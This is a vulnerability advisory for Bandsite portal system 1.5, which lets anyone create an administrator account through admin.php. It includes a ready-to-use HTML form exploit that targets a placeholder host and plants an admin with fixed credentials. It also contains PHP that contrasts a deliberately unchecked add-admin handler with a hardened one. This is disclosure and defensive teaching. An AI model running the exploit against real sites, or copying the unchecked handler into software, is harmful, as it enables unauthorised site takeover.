Bandsite portal system version 1.5 lacks authentication validation in its admin.php code when an administrator is added, thus allowing a remote attacker to gain administrative privileges.
Information :
°°°°°°°°°°°°°°
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php
- Author : Jelle de Vos
- Tested version : 1.5
- Problem : Vulnerability in Bandsite allows gaining admin access.
Product Description :
°°°°°°°°°°°°°°°°°°°°°
Bandsite is an online portal system designed for bands. Features: theme support, news posting, audio sections, a guestbook, a tour guide, an admin section to manage overall data and configuration, and more.
Exploits :
°°°°°°°°°°
===================== nmsh.htm ==============================
<HTML><BODY>
<TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
<TBODY>
<TR><TD bgcolor=#ffffff>
<form action="http://[target]/bandwebsite/admin.php?&Login=1&section=admins" method=post>
Name:<br>
<input type=text name='name' value='nmsh' size="20"><br>
Pass:<br>
<input type=text name='pass' value='nmsh' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form>
</TD></TR>
</TBODY></TABLE>
</BODY></HTML>
===================== nmsh.htm ==============================
The admin has been added!
:(
Now go to this link :
http://[target]/bandwebsite/login.php
and login as admin
name : nmsh
pass : nmsh
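The root cause named in the summary is an "add admin" handler that never checks who is calling it. The PHP below is an added illustration written for this advisory; it is not Bandsite's actual admin.php, and the table name, column names, session keys and the in-memory SQLite setup are assumptions. It places a minimal unchecked handler of the kind the advisory describes next to a hardened version of the same action, so the missing control is visible side by side.

```php
<?php
// Added illustration, not Bandsite's admin.php. Assumed schema: table "admins"
// with columns name and pass_hash. Assumed session keys: admin_id, csrf.

// --- Vulnerable pattern (hypothetical): the action trusts any POST it receives,
// so anyone who can reach the URL can create an administrator.
function add_admin_unchecked(PDO $pdo, array $post): bool
{
    $stmt = $pdo->prepare('INSERT INTO admins (name, pass_hash) VALUES (?, ?)');
    return $stmt->execute([$post['name'], password_hash($post['pass'], PASSWORD_DEFAULT)]);
}

// --- Hardened pattern: authorization comes from server-side session state,
// the request must be a POST carrying a CSRF token bound to that session,
// and the input is validated before it reaches the database.
function add_admin_checked(PDO $pdo, array $session, array $post, string $method): bool
{
    // 1. Only an already-authenticated admin may add another admin. Nothing
    //    supplied by the client (query string, form field, cookie value) is
    //    consulted for this decision.
    if (empty($session['admin_id'])) {
        return false; // caller should answer 403
    }
    // 2. State change requires POST plus a CSRF token compared in constant time.
    if ($method !== 'POST'
        || empty($session['csrf']) || empty($post['csrf'])
        || !hash_equals($session['csrf'], $post['csrf'])) {
        return false; // 403
    }
    // 3. Validate the new account's name and password policy.
    $name = trim((string)($post['name'] ?? ''));
    $pass = (string)($post['pass'] ?? '');
    if (!preg_match('/^[A-Za-z0-9_]{3,32}$/', $name) || strlen($pass) < 12) {
        return false; // 400
    }
    $stmt = $pdo->prepare('INSERT INTO admins (name, pass_hash) VALUES (?, ?)');
    $ok = $stmt->execute([$name, password_hash($pass, PASSWORD_DEFAULT)]);
    // 4. Leave an audit trail: who created which account. This is what an
    //    incident responder would look for after an unexplained admin appears.
    error_log(sprintf('admin "%s" created by admin_id %d', $name, (int)$session['admin_id']));
    return $ok;
}

// Self-contained demo using an in-memory SQLite database (constructed data).
function demo(): array
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE admins (name TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');

    $anonymousPost = ['name' => 'nmsh', 'pass' => 'nmsh', 'submit' => 'send'];

    // Unchecked handler: the anonymous request succeeds.
    $r1 = add_admin_unchecked($pdo, $anonymousPost);

    // Checked handler with no session: refused.
    $r2 = add_admin_checked($pdo, [], $anonymousPost, 'POST');

    // Checked handler with a real admin session and matching CSRF token: allowed.
    $session = ['admin_id' => 1, 'csrf' => bin2hex(random_bytes(16))];
    $goodPost = ['name' => 'second_admin', 'pass' => 'a-long-enough-password', 'csrf' => $session['csrf']];
    $r3 = add_admin_checked($pdo, $session, $goodPost, 'POST');

    $count = (int)$pdo->query('SELECT COUNT(*) FROM admins')->fetchColumn();
    return ['unchecked_anonymous' => $r1, 'checked_anonymous' => $r2,
            'checked_authorized' => $r3, 'rows' => $count];
}

if (PHP_SAPI === 'cli') {
    var_export(demo());
}
```

Running the demo shows the unchecked handler accepting the anonymous request (the advisory's scenario), the checked handler refusing the same request, and the checked handler accepting a request only when a server-side admin session and a matching CSRF token are present.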
Vendor:
°°°°°°°
Vendor has been contacted, no reply received.
Provided by :
°°°°°°°°°°°°°
Nasser.M.Sh
nmsh_sa(at)yahoo.com